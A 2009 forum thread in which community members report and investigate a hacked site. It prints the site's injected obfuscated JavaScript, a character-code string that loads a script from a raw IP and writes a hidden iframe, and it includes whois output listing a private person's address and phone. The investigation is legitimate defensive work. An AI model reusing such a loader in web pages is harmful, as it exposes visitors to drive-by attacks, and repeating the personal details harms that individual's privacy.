Skip to main content
Welcome guest. | Register | Login | Post

Please make safe again!

5 replies [Last post]
Joined: 2007-09-10

As I pointed out here: is not safe.

Now I'm no expert in web security, but I think if the .html code has been changed, the server has been compromised...

I made a little investigation to see what exactly happens there:
The html code of the page contains a javascript part which gets a script stat.js from

The code in index.html:

<script language="javascript">
var s="",i,c=0,o="";
var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";

Becomes this:

<script language="javascript">
document.write("<script type="text/javascript" src=""></script>");

Currently (may have been different before), stats.js looks like this:;
document.write('<iframe src="" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE></iframe>');

Which seems to set up an invisible frame showing , which is currently a page looking like but with some scripts inside it I haven't figured out yet. The page as well as stat.js may have changed anyway since google detected it as an attack site.

I attached all relevant files below, as well as a quick python script I used to decrypt the ascii (main code from Smiling

ascii_decoder.py_.txt1.33 KB
index.html5.96 KB
stat.js_.txt215 bytes
index.html.14.94 KB
index.html.1.simplified.txt4.94 KB
secret.txt283 bytes
decoded.txt118 bytes
Joined: 2007-09-10
It turns out

It turns out actually redirects directly to ^^
So index.html.1 is just a normal google page with google scripts.

$wget ""
--2009-04-22 17:02:13--
to connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2009-04-22 17:02:13--
Resolving,,, ...
Connecting to||:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: [following]
--2009-04-22 17:02:13--
Resolving,,, ...
Reusing existing connection to
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html.4'

    [ <=>                                                                                                                                                                  ] 5,028       --.-K/s   in 0.03s  

2009-04-22 17:02:13 (157 KB/s) - `index.html.4' saved [5028]

A little diff test (it makes no difference whether it's another wget or a wget

$diff index.html.7 index.html.8
< <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>{kEI:"bjLvScaeMNCNsAaEzcmPBw",kEXPI:"17259,20257",kHL:"de"};
> <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>{kEI:"cDLvSfrHEI-ysAbB4YyDBw",kEXPI:"17259,20257",kHL:"de"};
Joined: 2006-03-28
Here's what a really quick

Here's what a really quick check revealed:

[dennis@thinkpad ~]$ host domain name pointer
[dennis@thinkpad ~]$ whois                    
% This is the RIPE Whois query server #2.                   
% The objects are in RPSL format.                           
% Rights restricted by copyright.                           
% See                 

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to ' -'

inetnum: -
netname:        Serverboost-2                
descr:          IP Space provided by We Dare 
country:        NL                           
admin-c:        Sr4706-RIPE                  
tech-c:         Sr4706-RIPE                  
status:         ASSIGNED PA                  
mnt-by:         WEDARE-MNT                   
source:         RIPE # Filtered              

role:           Serverboost role
address:        Piet Paaltjensplein 62
address:        3027 TZ Rotterdam     
address:        The Netherlands       
phone:          +31 (0)6 1482 4915    
admin-c:        JM6856-RIPE           
tech-c:         JM6856-RIPE           
nic-hdl:        Sr4706-RIPE           
mnt-by:         MNT-I3D               
source:         RIPE # Filtered       

% Information related to ''

descr:        Route to first IP-numberblock We Dare BV
origin:       AS20495                                 
mnt-by:       WEDARE-MNT                              
source:       RIPE # Filtered                         

% Information related to ''

descr:          We Dare B.V.   
origin:         AS20495        
mnt-by:         WEDARE-MNT     
source:         RIPE # Filtered
[dennis@thinkpad ~]$ whois
[Redirected to]     
; This data is provided by Transip BV  
; for information purposes, and to assist persons obtaining information
; about or related to domain name registration records.                
; Transip BV does not guarantee its accuracy.                          
; By submitting a WHOIS query, you agree that you will use this data   
; only for lawful purposes and that, under no circumstances, you will  
; use this data to                                                     
; 1) allow, enable, or otherwise support the transmission of mass      
;    unsolicited, commercial advertising or solicitations via E-mail   
;    (spam); or                                                        
; 2) enable high volume, automated, electronic processes that apply    
;    to this WHOIS server.                                             
; These terms may be changed without prior notice.                     
; By submitting this query, you agree to abide by this policy.         


RSP: Transip BV 

owner-contact: P-DQA565
owner-organization: ardon, d
owner-fname: D              
owner-lname: ardon          
owner-street: eessenkamp 8  
owner-city: wapenveld       
owner-zip: 8191             
owner-country: NL           
owner-phone: +31388442066   

admin-contact: P-DQA565
admin-organization: ardon, d
admin-fname: D              
admin-lname: ardon          
admin-street: eessenkamp 8  
admin-city: wapenveld
admin-zip: 8191
admin-country: NL
admin-phone: +31388442066

tech-contact: P-DQA565
tech-organization: ardon, d
tech-fname: D
tech-lname: ardon
tech-street: eessenkamp 8
tech-city: wapenveld
tech-zip: 8191
tech-country: NL
tech-phone: +31388442066

billing-contact: P-DQA565
billing-organization: ardon, d
billing-fname: D
billing-lname: ardon
billing-street: eessenkamp 8
billing-city: wapenveld
billing-zip: 8191
billing-country: NL
billing-phone: +31388442066


; Transip BV
; Real-time domeinregistratie en -beheer vanaf 4.99 Euro!
Gustavo's picture
Joined: 2006-09-11
I'm fixing this right now.

I'm fixing this right now. is still hosted in our shared host at DreamHost and it got hacked (well, nothing else can explain this; neither Olivier or I would do this), so I'm moving it to our dedicate server.

I forgot that KIaze reported this in another thread, sorry. I started working on this because of

Thank you, reptiler and KIAaze.

Joined: 2007-09-10
Thanks for fixing it. It's

Thanks for fixing it.
It's now 100% fixed since Google doesn't mark it as an attack site anymore. Smiling

I'll remember to use the GLM tracker (or the mailing-list) instead of the forum next time. Eye

By the way: How dangerous is it to be redirected to Google from another server?
Can they somehow intercept authentication data when you have a Google account for example?

Joined: 2007-09-10
Re: Please make safe again!

The bugtracker being a little bit slow, I'll post here again. seems to have been hacked again. Sad

I started directing people directly to the FSF site instead because of this.
Hopefully, this will never happen to because I don't know any equivalent for it. ( Bought myself a new GNU/Linux preloaded PC through it from Smiling )

(If softwareliberty can't be made safe, it would be nice to remove/replace all links to it from the other GLM sites.)

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.